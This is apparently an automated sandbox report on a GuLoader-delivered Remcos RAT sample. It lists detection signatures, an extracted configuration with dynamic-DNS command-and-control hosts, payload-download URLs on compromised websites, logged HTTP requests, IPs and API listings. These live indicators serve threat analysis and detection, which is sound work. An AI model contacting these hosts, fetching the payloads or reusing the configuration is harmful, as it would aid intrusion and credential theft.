Windows Analysis Report
17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe

Overview

General Information

Sample name: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
Analysis ID: 1483073
MD5: 3ad8cb387874a15488508bf269fd2520
SHA1: e083d92b7f1668b105c18ce5772caccc8705b903
SHA256: 1b97d7dd602a1a105948d1607a6c8bc2014eb752078e35f839b4a5c5095a4e90
Tags: base64-decodedexe
Infos:

Detection

GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Obfuscated command line found
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Avira: detected
Antivirus detection for URL or domain
Source: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm Avira URL Cloud: Label: malware
Source: https://asociatiatraditiimaria.ro/os/transportment.pfm Avira URL Cloud: Label: malware
Source: iwarsut775laudrye2.duckdns.org Avira URL Cloud: Label: malware
Source: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm0 Avira URL Cloud: Label: malware
Source: https://new.quranushaiqer.org.sa Avira URL Cloud: Label: malware
Source: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfml Avira URL Cloud: Label: phishing
Found malware configuration
Source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack Malware Configuration Extractor: Remcos {"Version": "5.1.0 Pro", "Host:Port:Password": "iwarsut775laudrye2.duckdns.org:57484:0iwarsut775laudrye2.duckdns.org:57483:1iwarsut775laudrye3.duckdns.org:57484:0hjnourt38haoust1.duckdns.org:57484:0", "Assigned name": "MAGIC", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "shietgtst-A57Q98", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "sfvnspt.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Yara detected Remcos RAT
Source: Yara match File source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLE
Source: Yara match File source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4549696326.000000000072E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2171694344.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.2170895717.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.2172358054.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 4368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3744, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3792, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3504, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 0_2_00433837
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData, 4_2_00404423
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_a7d83305-1

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLE
Source: Yara match File source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2171694344.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.2170895717.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.2172358054.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 4368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3744, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3792, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3504, type: MEMORYSTR

Privilege Escalation
barindex
Contains functionality to bypass UAC (CMSTPLUA)
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_004074FD _wcslen,CoGetObject, 0_2_004074FD
Uses 32bit PE files
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 93.113.54.56:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.166.62.190:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: Binary string: m.Core.pdb source: powershell.exe, 00000007.00000002.4567700425.0000000006D69000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Automation.pdb source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.4570530076.0000000008800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbS(b source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdb source: powershell.exe, 00000007.00000002.4567700425.0000000006D69000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdbd source: powershell.exe, 0000000B.00000002.4570530076.0000000008800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: stem.Core.pdbP source: powershell.exe, 0000000B.00000002.4570530076.0000000008800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_00409253
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 0_2_0041C291
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 0_2_0040C34D
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_00409665
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0044E879 FindFirstFileExA, 0_2_0044E879
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 0_2_0040880C
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0040783C FindFirstFileW,FindNextFileW, 0_2_0040783C
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW, 0_2_00419AF5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 0_2_0040BB30
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 0_2_0040BD37
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_100010F1
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_10006580 FindFirstFileExA, 0_2_10006580
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0040AE51 FindFirstFileW,FindNextFileW, 4_2_0040AE51
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 5_2_00407EF8
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 6_2_00407898
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 0_2_00407C97

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: iwarsut775laudrye2.duckdns.org
Uses dynamic DNS services
Source: unknown DNS query: name: iwarsut775laudrye2.duckdns.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /os/transportment.pfm HTTP/1.1Host: asociatiatraditiimaria.ro
Source: global traffic HTTP traffic detected: GET /wp-admin/oserve/transportment.pfm HTTP/1.1Host: new.quranushaiqer.org.saConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 93.113.54.56 93.113.54.56
Source: Joe Sandbox View IP Address: 192.253.251.227 192.253.251.227
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: THORDC-ASIS THORDC-ASIS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /os/transportment.pfm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: asociatiatraditiimaria.roConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_0041B380
Source: global traffic HTTP traffic detected: GET /os/transportment.pfm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: asociatiatraditiimaria.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /os/transportment.pfm HTTP/1.1Host: asociatiatraditiimaria.ro
Source: global traffic HTTP traffic detected: GET /wp-admin/oserve/transportment.pfm HTTP/1.1Host: new.quranushaiqer.org.saConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4555963712.0000000003810000.00000040.10000000.00040000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2198414085.0000000002238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2198414085.0000000002238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4554798686.0000000002DC0000.00000040.10000000.00040000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4554798686.0000000002DC0000.00000040.10000000.00040000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: iwarsut775laudrye2.duckdns.org
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: global traffic DNS traffic detected: DNS query: asociatiatraditiimaria.ro
Source: global traffic DNS traffic detected: DNS query: new.quranushaiqer.org.sa
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Fri, 26 Jul 2024 13:47:10 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Fri, 26 Jul 2024 13:47:16 GMTserver: LiteSpeed
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
Source: powershell.exe, 0000000B.00000002.4564122070.0000000007581000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mB
Source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000007.00000002.4567700425.0000000006D69000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.4552699626.0000000003221000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000007.00000002.4572916909.0000000007E87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft.
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
